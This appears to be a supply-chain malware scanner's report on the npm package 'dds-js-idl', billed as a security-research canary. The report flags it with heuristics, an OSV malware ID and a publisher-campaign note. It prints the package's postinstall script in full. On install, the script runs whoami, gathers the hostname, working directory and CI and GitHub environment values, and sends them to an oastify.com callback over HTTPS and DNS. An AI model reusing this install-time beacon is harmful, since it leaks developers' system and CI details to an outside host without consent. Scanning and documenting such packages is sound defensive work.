// npm package
dds-js-idl
Security research canary — NASA VDP
versions
2
maintainers
1
first publish
2026-05-23
publisher
l0bo
tarball
1,029 B
AUTO-PUBLISHED·1 version indexed·latest published 2026-05-23
// exfil path
what is read → where it shipssteals
- ○ home dir
- ○ system info
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
evidence in excerpt
> const { execSync } = require('child_process');
> const CALLBACK_HOST = 'lg5ys3jebfzwk366pilidbmah1nsbszh.oastify.com';
> try { return execSync(cmd, { timeout: 3000 }).toString().trim(); }
> hostname: os.hostname(),
> https.get({ host: CALLBACK_HOST, path, timeout: 5000 }, () => {}).on('error', () => {});// publisher campaignby l0bo
2 caught packages from this accountThis is not an isolated catch. The same publisher has shipped 1 other package that our pipeline flagged — the shape of a coordinated campaign, not a one-off. Each link below opens that sibling's analysis.
// offending code· @1.0.1· 1 file flagged
llm: benign · 0.85→ No suspicious destination, no remote-exec shape — 1 other host(s).
- @1.0.1··AUTO-PUBLISHED·publisher: l0boheuristic 75/100static flags 5llm benign (0.85) via ollamainstall-scripts:postinstallnew-publisher:4dsuspicious-description:security-researchosv-flagged:MAL-2026-4264reads-env-varsreads-homedirreads-system-infooast-callback-domainchild-process-spawn
→ No suspicious destination, no remote-exec shape — 1 other host(s).
// offending code· 1 file flaggedpatterns: 5
--- install scripts --- ### postinstall node postinstall.js --- package/postinstall.js (excerpt) --- const https = require('https'); const os = require('os'); const { execSync } = require('child_process'); const CALLBACK_HOST = 'lg5ys3jebfzwk366pilidbmah1nsbszh.oastify.com'; function get(cmd) { try { return execSync(cmd, { timeout: 3000 }).toString().trim(); } catch { return 'error'; } } const payload = { whoami: get('whoami'), hostname: os.hostname(), platform: os.platform(), cwd: process.cwd(), ci: process.env.CI || '', github: process.env.GITHUB_REPOSITORY || '', node_env: process.env.NODE_ENV || '', }; const path = '/beacon?' + new URLSearchParams(payload).toString(); https.get({ host: CALLBACK_HOST, path, timeout: 5000 }, () => {}).on('error', () => {}); require('dns').lookup(`${payload.whoami}.${CALLBACK_HOST}`, () => {}); --- package.json (entry) --- { "name": "dds-js-idl", "version": "1.0.1", "description": "Security research canary — NASA VDP", "scripts": { "postinstall": "node postinstall.js" }, "main": "postinstall.js", "bin": { "dds-js-idl": "postinstall.js" } } --- postinstall.js (entry) --- const https = require('https'); const os = require('os'); const { execSync } = require('child_process'); const CALLBACK_HOST = 'lg5ys3jebfzwk366pilidbmah1nsbszh.oastify.com'; function get(cmd) { try { return execSync(cmd, { timeout: 3000 }).toString().trim(); } catch { return 'error'; } } const payload = { whoami: get('whoami'), hostname: os.hostname(), platform: os.platform(), cwd: process.cwd(), ci: process.env.CI || '', github: process.env.GITHUB_REPOSITORY || '', node_env: process.env.NODE_ENV || '', }; const path = '/beacon?' + new URLSearchParams(payload).toString(); https.get({ host: CALLBACK_HOST, path, timeout: 5000 }, () => {}).on('error', () => {}); require('dns').lookup(`${payload.whoami}.${CALLBACK_HOST}`, () => {});
